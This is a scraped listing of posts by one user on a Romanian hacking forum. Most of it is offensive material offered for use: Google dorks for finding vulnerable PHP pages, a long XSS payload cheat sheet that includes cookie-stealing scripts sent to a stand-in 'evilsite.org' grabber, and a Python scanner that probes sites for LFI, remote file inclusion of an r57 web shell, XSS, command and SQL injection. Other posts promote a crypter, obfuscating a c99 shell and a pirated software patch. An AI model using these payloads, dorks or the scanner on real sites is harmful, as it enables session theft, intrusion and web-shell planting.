-
Posts
984 -
Joined
-
Last visited
-
Days Won
10
Everything posted by Jimmy
-
Felicitari Wav3, +1
-
Un fel de crypter... Download Rar pass: troyanosyvirus.com.ar http://vscan.novirusthanks.org/analysis Sursa
-
Secretele disp?rute ale lui Nikola Tesla
-
Code Eclipse - PHP Obfuscator Am facut o proba pe un shell c99:
-
XSS Dorks inurl:".php?cmd=" inurl:".php?z=" inurl:".php?q=" inurl:".php?search=" inurl:".php?query=" inurl:".php?searchstring=" inurl:".php?keyword=" inurl:".php?file=" inurl:".php?years=" inurl:".php?txt=" inurl:".php?tag=" inurl:".php?max=" inurl:".php?from=" inurl:".php?author=" inurl:".php?pass=" inurl:".php?feedback=" inurl:".php?mail=" inurl:".php?cat=" inurl:".php?vote=" inurl:search.php?q= inurl:com_feedpostold/feedpost.php?url= inurl:scrapbook.php?id= inurl:headersearch.php?sid= inurl:/poll/default.asp?catid= inurl:/search_results.php?search= XSS Cheats '';!--"<XSS>=&{()} '>//\\,<'>">">"*" '); alert('XSS <script>alert(1);</script> <script>alert('XSS');</script> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script> <IMG LOWSRC=\"javascript:alert('XSS')\"> <IMG DYNSRC=\"javascript:alert('XSS')\"> <font style='color:expression(alert(document.cookie))'> <img src="javascript:alert('XSS')"> <script language="JavaScript">alert('XSS')</script> <body onunload="javascript:alert('XSS');"> <body onLoad="alert('XSS');" [color=red' onmouseover="alert('xss')"]mouse over[/color] "/></a></><img src=1.gif onerror=alert(1)> window.alert("Bonjour !"); <div style="x:expression((window.r==1)?'':eval('r=1; alert(String.fromCharCode(88,83,83));'))"> <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> "><script alert(String.fromCharCode(88,83,83))</script> '>><marquee><h1>XSS</h1></marquee> '">><script>alert('XSS')</script> '">><marquee><h1>XSS</h1></marquee> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> <script>var var = 1; alert(var)</script> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <?='<SCRIPT>alert("XSS")</SCRIPT>'?> <IMG SRC='vbscript:msgbox(\"XSS\")'> " onfocus=alert(document.domain) "> <" <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out <br size=\"&{alert('XSS')}\"> <scrscriptipt>alert(1)</scrscriptipt> </br style=a:expression(alert())> </script><script>alert(1)</script> "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> [color=red width=expression(alert(123))][color] <BASE HREF="javascript:alert('XSS');//"> Execute(MsgBox(chr(88)&chr(83)&chr(83)))< "></iframe><script>alert(123)</script> <body onLoad="while(true) alert('XSS');"> '"></title><script>alert(1111)</script> </textarea>'"><script>alert(document.cookie)</script> '""><script language="JavaScript"> alert('X \nS \nS');</script> </script></script><<<<script><>>>><<<script>alert(123)</script> <html><noalert><noscript>(123)</noscript><script>(123)</script> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> '></select><script>alert(123)</script> '>"><script src = 'http://www.site.com/XSS.js'></script> }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> <SCRIPT>document.write("XSS");</SCRIPT> a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); ='><script>alert("xss")</script> <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script> <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body> ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script> ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> src="http://www.site.com/XSS.js"></script> data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !--" /><script>alert('xss');</script> <script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> "><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> '"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee> "><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee> '"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee> <iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
-
#!/usr/bin/python #LinkScanSingle will take a site and #collect links from the source. If the link #contains a = it checks LFI,XSS,RFI,SQL,CMD injection #searching source (simple) #If your going to use a different shell then the #one I have supplied, you will need to change line #54 (r57shell) to something in your shell source. from sgmllib import SGMLParser import sys, urllib, httplib, re, urllib2, sets, socket socket.setdefaulttimeout(5) class URLLister(SGMLParser): def reset(self): SGMLParser.reset(self) self.urls = [] def start_a(self, attrs): href = [v for k, v in attrs if k=='href'] if href: self.urls.extend(href) def parse_urls(links): urls = [] for link in links: num = link.count("=") if num > 0: for x in xrange(num): x = x+1 if link[0] == "/" or link[0] == "?": url = site+link.rsplit("=",x)[0]+"=" else: url = link.rsplit("=",x)[0]+"=" if url.find(site.split(".",1)[1]) == -1: url = site+url if url.count("//") > 1: url = "http://"+url[7:].replace("//","/",1) urls.append(url) urls = list(sets.Set(urls)) return urls def main(host): print "\n\t[+] Testing:",host,"\n" try: if verbose == 1: print "[+] Checking XSS" xss(host) except(urllib2.HTTPError, urllib2.URLError), msg: #print "[-] XSS Error:",msg pass try: if verbose == 1: print "[+] Checking LFI" lfi(host) except(urllib2.HTTPError, urllib2.URLError), msg: #print "[-] LFI Error:",msg pass try: if verbose == 1: print "[+] Checking RFI" rfi(host) except(urllib2.HTTPError, urllib2.URLError), msg: #print "[-] RFI Error:",msg pass try: if verbose == 1: print "[+] Checking CMD" cmd(host) except(urllib2.HTTPError, urllib2.URLError), msg: #print "[-] CMD Error:",msg pass try: if verbose == 1: print "[+] Checking SQL" sql(host) except(urllib2.HTTPError, urllib2.URLError), msg: #print "[-] SQL Error:",msg pass def rfi(host): try: source = urllib2.urlopen(host+RFI).read() if re.search("r57shell", source): print "[+] RFI:",host+RFI else: if verbose == 1: print "[-] Not Vuln." except(),msg: #print "[-] Error Occurred",msg pass def xss(host): source = urllib2.urlopen(host+XSS).read() if re.search("XSS", source) != None: print "[!] XSS:",host+XSS else: if verbose == 1: print "[-] Not Vuln." def sql(host): for pload in SQL: source = urllib2.urlopen(host+pload).read() if re.search("Warning:", source) != None: print "[!] SQL:",host+pload else: if verbose == 1: print "[-] Not Vuln." def cmd(host): source = urllib2.urlopen(host+CMD).read() if re.search("uid=", source) != None: print "[!] CMD:",host+CMD else: if verbose == 1: print "[-] Not Vuln." def lfi(host): source = urllib2.urlopen(host+LFI).read() if re.search("root:", source) != None: print "[!] LFI:",host+LFI else: if verbose == 1: print "[-] Not Vuln." source = urllib2.urlopen(host+LFI+"%00").read() if re.search("root:", source) != None: print "[!] LFI:",host+LFI+"%00" else: if verbose == 1: print "[-] Not Vuln. w/ Null Byte" print "\n\t d3hydr8[at]gmail[dot]com LinkScanSingle v1.3" print "\t-------------------------------------------------\n" if len(sys.argv) not in [2,3]: print "Usage : ./linkscan.py <site> [option]" print "Ex: ./linkscan.py http://www.google.com -verbose" print "\n\t[Option]" print "\t\t-verbose/-v | Verbose Output\n" sys.exit(1) LFI = "../../../../../../../../../../../../etc/passwd" RFI = "http://yozurino.com/r.txt?" RFI_TITLE = "Target" XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E" CMD = "|id|" SQL = ["-1","999999"] #Add more or change sql payloads site = sys.argv[1].replace("\n","") print "\n[+] Collecting:",site try: if sys.argv[2].lower() == "-v" or sys.argv[2].lower() == "-verbose": verbose = 1 print "[+] Verbose Mode On\n" except(IndexError): print "[-] Verbose Mode Off\n" verbose = 0 pass site = site.replace("http://","").rsplit("/",1)[0]+"/" site = "http://"+site.lower() try: usock = urllib.urlopen(site) parser = URLLister() parser.feed(usock.read().lower()) parser.close() usock.close() except(IOError, urllib2.URLError), msg: print "[-] Error Connecting to",site print "[-]",msg sys.exit(1) urls = parse_urls(parser.urls) print "[+] Links Found:",len(urls) for url in urls: try: main(url) except(KeyboardInterrupt): pass print "\n[-] Done\n" Sursa: Pastebin.com
-
Revo.Uninstaller.Pro.v2.5.1 + patch
-
Stiu, dar exista Google.
-
Pentru a scana dupa ip-uri cu portul 3389 deschis poti folosi vnc scanner. Arunca o privire aici.
-
Crack-me v2 hint = 1337
-
Itradevar e foarte simplu , acest crack-me e mai mult 4 beginners.
-
Un crack-me foarte simplu de rezolvat. Download Edit: Pentru useri mai avansati: Crack-me v2 (acelasi crack-me putin mai complex) ---------------------------- XandZero +1 rep LLegoLLaS + 1 rep Wav3, pune o dovada ca l-ai facut pe primul. Usr6 +1 rep devianc3 +1 rep zovy52 +1 rep z3nc0de +1 rep symboss +1 rep gigaevil +2 rep staticwater + 2 rep
-
Respect BUNNN, the best coder. Sursa